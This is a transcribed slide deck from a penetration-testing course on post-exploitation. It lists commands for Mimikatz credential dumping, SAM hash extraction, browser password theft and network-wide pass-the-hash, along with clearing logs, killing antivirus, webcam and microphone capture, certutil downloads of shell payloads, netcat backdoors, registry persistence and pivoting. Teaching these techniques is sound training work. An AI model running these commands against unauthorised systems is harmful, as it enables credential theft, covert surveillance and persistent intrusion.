Practical White Hat Hacker Training - Post Exploitation

1. www.prismacsi.com © All Rights Reserved. 1 Practical White Hat Hacker Training #6 Post Explotation This document may be quoted or shared, but cannot be modified or used for commercial purposes. For more information, visit https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr

4. www.prismacsi.com © All Rights Reserved. 4 Domain Exploitation • To be able to penetrate all systems : • Vulnerabilities are used to penetrate target systems and user or session information is gathered. • Systems can be penetrated thanks to bruteforce attacks. • An attempt to penetrate additional systems can be done using files containing detailed information about a given system . • As a result, the path to Domain Admin opens. • The control is in your hands!

5. www.prismacsi.com © All Rights Reserved. 5 Domain Exploitation • Generally when a windows system is penetrated; • SAM ve SYSTEM files are accessed. • %WINDIR%system32configSAM • %WINDIR%system32configSYSTEM • Samdump2 is obtained using hashes. • Or hashdump is run on a metasploit session. • Obtained hashes are cracked or pass-the-hash method is used to try the hashes through the entire network.

6. www.prismacsi.com © All Rights Reserved. 6 Mimikatz - Demo • Plain text passwords can be obtained with Mimikatz from the memory. • https://github.com/gentilkiwi/mimikatz • mimikatz # privilege::debug • mimikatz # sekurlsa::logonpasswords

7. www.prismacsi.com © All Rights Reserved. 7 Browser Passwords • There are several browser modules available on Metasploit. • run post/windows/gather/enum_chrome • run post/multi/gather/firefox_creds • git clone https://github.com/Unode/firefox_decrypt.git • Nirsoft software can be used • https://www.nirsoft.net/utils/web_browser_password.html

8. www.prismacsi.com © All Rights Reserved. 8 MS14-068 Vulnerability • Allowing access to Domain Admin authority is a critical level vulnerability. • Kerberos vulnerability • PyKEK script can be used for a simple exploit. (https://github.com/mubix/pykek )

9. www.prismacsi.com © All Rights Reserved. 9 Meterpreter • It’s an advanced payload found in Metasploit that can be used to manually, thanks to post exploits, perform a number of actions quickly. • Can be though of as Superman. • Post exploitation is ensuring the admin privilege is never lost.

10. www.prismacsi.com © All Rights Reserved. 10 Post Exploitation • Refers to actions after an exploit. • Target-specific research techniques • Steps to obtain password summaries • Discovering configuration files • Action of identifying domain users • Obtaining passwords from the memory • Inventory extraction

11. www.prismacsi.com © All Rights Reserved. 11 Post Exploitation - Demo • Meterpreter Basic Commands • sysinfo – Used to obtain information about the system • background – Moves sessions to the background • getuid – Used to obtain uid information • upload – Uploads files to the system • download – Downloads files from the system

12. www.prismacsi.com © All Rights Reserved. 12 Post Exploitation - Demo • Meterpreter Basic Commands • screenshot – Obtains screeshots • ps – lists running processes • migrate – Used to move into another running process to maintain persistence • getsystem – Used for privilege escalation

13. www.prismacsi.com © All Rights Reserved. 13 Post Exploitation - Demo • Meterpreter Basic Commands • Hashdump – obtains hashes of user information • run hashdump – runs the hashdump post exploit • record_mic – used to record audio • webcam_snip 1 – activates a camera on the system if there is any and obtains images.

14. www.prismacsi.com © All Rights Reserved. 14 Post Exploitation - Demo • Listening to target system network traffic using Meterpreter. • use sniffer – executes/runs the sniffer. • sniffer_interfaces – shows interfaces. • sniffer_start 3- records packets for interface number 3. • sniffer_dump 3 /tmp/dump.pcap – Keep the traffic record received for interface 3

15. www.prismacsi.com © All Rights Reserved. 15 Post Exploitation - Demo • The other Meterpreter commands • enum_firefox – Firefox browser is used to draw data if it is installed in the system • clearev – used to delete logs • killav – used to shut down antiviruses • run get_application_list – lists all the applications installed on the system • run hostedit -e 10.0.1.5,facebook.com – Sir how can I hack facebook accounts? J • enable_rdp – Used to activate the RDP service.

16. www.prismacsi.com © All Rights Reserved. 16 Post Exploitation - Demo • Meterpreter Post Exploit Using • run post/<TAB> • use post/windows/gather/enum_domain – Used for domain enumeration. • run post/windows/gather/enum_applications – discovers applications installed on the system. • run post/windows/gather/credentials/winscp – Gets the passwords from the winscp application installed on the system.

17. www.prismacsi.com © All Rights Reserved. 17 Post Exploitation - Demo • Commands used for privilege escalation • getsystem – If there is a way to access the NT AUTHORITY System privileges on the system, it makes you the most authoritative user by using that way. • bypass_uac – used to bypass UAC.

18. www.prismacsi.com © All Rights Reserved. 18 Post Exploitation - Demo • Meterpreter special modules • incognito – it is life <3 • use incognito – activates incognito mode • list_tokens – lists the tokens available on the system • impersonate_token – allows a user to impersonate the tokens available on the system • When you capture the domain admin tokens you can escalate your privileges by using incognito.

19. www.prismacsi.com © All Rights Reserved. 19 Post Exploitation • Empire is a post-exploitation tool that uses PowerShell and Python. • Includes flexible and cryptic security structure in modules to be used on target systems in the post-exploitation stage. • If the system uses a security measure such as an anti- virus, Empire can bypass this because it uses PowerShell.

20. www.prismacsi.com © All Rights Reserved. 20 Post Exploitation • Empire has three main features. • We use these features and the modules they include in the post-exploitation process. • They are: • Listeners • Stagers • Agents

21. www.prismacsi.com © All Rights Reserved. 21 Post Exploitation • The first thing we can do is start a listener to get the shell through Empire just like in Metasploit. • With the listeners command, we enter the listeners menu and all the active listeners are listed. • After selecting our listener and adjusting the settings, we activate the listener with the execute command.

23. www.prismacsi.com © All Rights Reserved. 23 Post Exploitation • After starting a listener, the Empire tool contains various stagers that will send it a connection and enable the listener to connect to the target system. • usestager <tab> command lists appropriate stagers and after selecting one suitable for our purpose and performing the necessary configurations, the execute command is used to run it.

26. www.prismacsi.com © All Rights Reserved. 26 Post Exploitation • After the listener is started and the stager is run in the target system, a warning is received from the agents module on the connection opened. • agents command is used to navigate to the menu. • To activate the opened connection, interact <connection-name> command is used.

28. www.prismacsi.com © All Rights Reserved. 28 Post Exploitation - CME • Crackmapexec (CME) • It is like a Swiss Army Knife • There are a lot of features available to speed up your network-based attacks. • With a single command you can execute pass the hash attacks on the whole network and use the tokens available with mimikatz to perform memory dumps e.tc

29. www.prismacsi.com © All Rights Reserved. 29 Post Exploitation – CME – Demo • You can scan the entire network with a username and password. • crackmapexec smb 10.0.1.0/24 -u Administrator-p Password123! • You can perform a Pass the Hash attack. • crackmapexec smb 10.0.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949 • You can run mimikatz on all the systems that you have successfully penetrated. • crackmapexec smb 192.168.1.1/24 -u Administrator -p Password123! -M mimikatz

30. www.prismacsi.com © All Rights Reserved. 30 Post Exploitation – Dfile Transfer • After penetrating a system, you may not have capable agents like meterpreter at your disposal to perform file transfer. You can use the following commands to transfer files within the shell you already own. • Python 2 : • Start service: python -m SimpleHTTPServer 8000 • Get with client: wget http://10.0.1.5:8000/file • Python 3 : • Start service : python –m http.server 8000 • Get with client : wget http://10.0.1.5:8000/file

31. www.prismacsi.com © All Rights Reserved. 31 Post Exploitation – File Transfer • You can also perform file transfer after starting the Apache service on your own machine. • Caution! You may not be able to get raw content if the programming language is present on the system (Examole:php) • Start service: service apache2 start • Get with the client: wget http://10.0.1.5 • It can also be done with PHP. • Start service: php -S 0.0.0.0:8000 • Get with the client: wget http://10.0.1.5:8000

32. www.prismacsi.com © All Rights Reserved. 32 Post Exploitation – File Transfer • If the system you hacked is Windows? • You can use bitsadmin. • bitsadmin /transfer n http://domain/file c:%homepath%file • You can also use certutil • certutil.exe -urlcache -split -f "http://10.10.15.76:88/shell.exe" • You can also transfer files with nc. If nc binary is not present in the target system upload and run it. • nc –l 1337 > filename • nc 10.0.1.6 1337 < filename • The method of use may vary with the nc version. For example while specifying the port some versions may also require –p parameter. • Example: nc –l –p 1337

33. www.prismacsi.com © All Rights Reserved. 33 Privilege Escalation Attacks • There are multiple privilege groups on the system. • For Linux and MacOS root is the user with the highest privileges while for Windows it is the Administrator user. • With privilege escalation attacks any user can get access to a privileged user’s credentials. • Local Exploits!

34. www.prismacsi.com © All Rights Reserved. 34 Privilege Escalation Attacks • Why do we need them? • To read and write on sensitive files in the system • To maintain persistence on the system • To seize the system with full privileges • For advanced monitoring of the system

35. www.prismacsi.com © All Rights Reserved. 35 Privilege Escalation Attacks • Linux Privilege Escalation attack types • Kernel exploits • Exploitation of services running with root authority • Exploitation of programs with Suid-bit privileges • Exploitation of users with sudo rights • Exploitation of cron-job applications with configuration errors.

36. www.prismacsi.com © All Rights Reserved. 36 Privilege Escalation Attacks • Kernel Exploits • Kernel exploits are programs that allow scripts to be run with elevated privileges by using vulnerabilities in the Linux kernel (kernel). • A successful kernel exploit usually allows the user to run commands with super user privileges (#root). • For an exploit to work on a target system, there has to be a machine that runs a vulnerable kernel version and a connection to deploy the exploit on that machine. We also have to be able to execute the exploit once it is deployed on the target system.

37. www.prismacsi.com © All Rights Reserved. 37 Privilege Escalation Attacks • CAUTION! • Kernel exploits should always be used as a last resort. This is because most of the exloits found online are not stable and may lead to crashing of the system on which they are run. The exploits may also leave traces and logs on the target system.

39. www.prismacsi.com © All Rights Reserved. 39 Privilege Escalation Attacks • Exploiting services running with root privileges • Exploiting any service that works with root privileges always results in a root shell. Therefore, you should always check the services that are running on your system, see if they run with root privilege. If unnecessary then do not run them with root authority.

41. www.prismacsi.com © All Rights Reserved. 41 Privilege Escalation Attacks • SUID Bit Exploit • SUID (Set User ID) is a Linux feature for running a program with specified user privileges. For example, the ping command should always work with root privileges to open network sockets. Therefore, any system on which it is installed automatically has the SUID permission with the privileges of the root user. In this way each user can use the ping command.

44. www.prismacsi.com © All Rights Reserved. 44 Privilege Escalation Attacks • Sudo Privilege Exploitation • If any sudo user credentials have been accessed then any command can be run with root privileges by using the user's sudo privileges.

46. www.prismacsi.com © All Rights Reserved. 46 Privilege Escalation Attacks • Cronjob Exploit • If a script or binary can be written as a cron-job, we can obtain root shell by editing the script or binary.

48. www.prismacsi.com © All Rights Reserved. 48 Privilege Escalation Attacks • Recommendations • First scanning target systems with scripted tools like LinEnum gives us a lot of information about the system. • It is a good idea to comprehensively search the target system, as from past experiences, some users have been known to store credentials in .txt form found in arbitrary folders in the computer. • In the event that credentials are discovered, a privilege escalation attack attempt may become needless.

49. www.prismacsi.com © All Rights Reserved. 49 Privilege Escalation Attacks • Windows privilege escalation attack types • Windows Kernel Exploit • Migration with Meterpreter • Stored credentials • Domain Exploitation

54. www.prismacsi.com © All Rights Reserved. 54 Privilege Escalation Attacks • With this module, you can escalate your privilege by switching to any process that runs with Administrator User privileges on the target system.

56. www.prismacsi.com © All Rights Reserved. 56 Persistence • Persistence is a method that ensures a permanent presence in the target system after receiving a shell. This can be any script or backdoor that has been injected into a running process. The rest is up to a hackers imagination.

57. www.prismacsi.com © All Rights Reserved. 57 Persistence • Technique - Backdoor • Backdoors are the first and easiest methods that come to mind. • Many of these can easily be accessed from online information security communities. • The downside is that backdoors can easily be detected.

58. www.prismacsi.com © All Rights Reserved. 58 Persistence • Techniques - Direct Code Injection • Adding malicious code without damaging already running applications. • Since a new application is not executed and injection is only performed on an already running application, detection is almost impossible. • The downside is that the persistence is lost when the system is rebooted.

59. www.prismacsi.com © All Rights Reserved. 59 Persistence • Metasploit – Persistence Module • After receiving the meterpreter shell on the target system, the run persistence command is executed by adjusting the necessary settings. In this manner metasploit automatically places a backdoor on the system. Later on a shell can be retrieved from the specified IP address and port at any time.

62. www.prismacsi.com © All Rights Reserved. 62 Persistence • registry_persistence module • This module creates a payload that runs during boot and embeds it in the system. Thus the system runs payloads every time the system is rebooted and the shell can be retrieved.

63. www.prismacsi.com © All Rights Reserved. 63 Persistence • Netcat Use • Netcat is a network tool for reading and writing files using TCP / IP protocol. Can be used to maintain persistence in the target system. • First the nc.exe file is uploaded to the target system.

64. www.prismacsi.com © All Rights Reserved. 64 Persistence • Netcat Use • The registry value is then set to run nc.exe. • Firewall rules are added to enable the target system to run nc.exe file and the firewall is disabled.

66. www.prismacsi.com © All Rights Reserved. 66 Persistence • Netcat use • We now have a backdoor in the system. Using Netcat we can get shell from the target system whenever we want. • nc –lvp 10.0.0.55 1337

67. www.prismacsi.com © All Rights Reserved. 67 Pivoting • Imagine a corporate structure. • There is an open server and this server is connected with other internal systems. • You have infiltrated this server from the outside and you want to have access to the internal network as well. • This is exactly what is referred to as pivoting.

68. www.prismacsi.com © All Rights Reserved. 68 Pivoting • You can use tunneling techniques to perform pivoting. • If the target institution has a proxy server, then you have pivoting resources in your hands. • SSH tunneling techniques can be used • Shuttle is the best tool • A poor man’s vpn over SSH J • sudo apt-get install sshuttle • sshuttle -r root@ipaddress 0.0.0.0/0 -vv

69. www.prismacsi.com © All Rights Reserved. 69 Pivoting with Metasploit • You can also use the agent meterpreter in Metasploit to perform pivoting. • You first have to add a routing. • run autoroute -s network/subnet • run autoroute –p : you can check the rules you have added. • You may want to perform port fowarding. • portfwd add -l 88 -p 80-r ipaddress • Firefox -> ipaddress:88

Practical White Hat Hacker Training - Post Exploitation

PRISMA CSI

Practical White Hat Hacker Training - Post Exploitation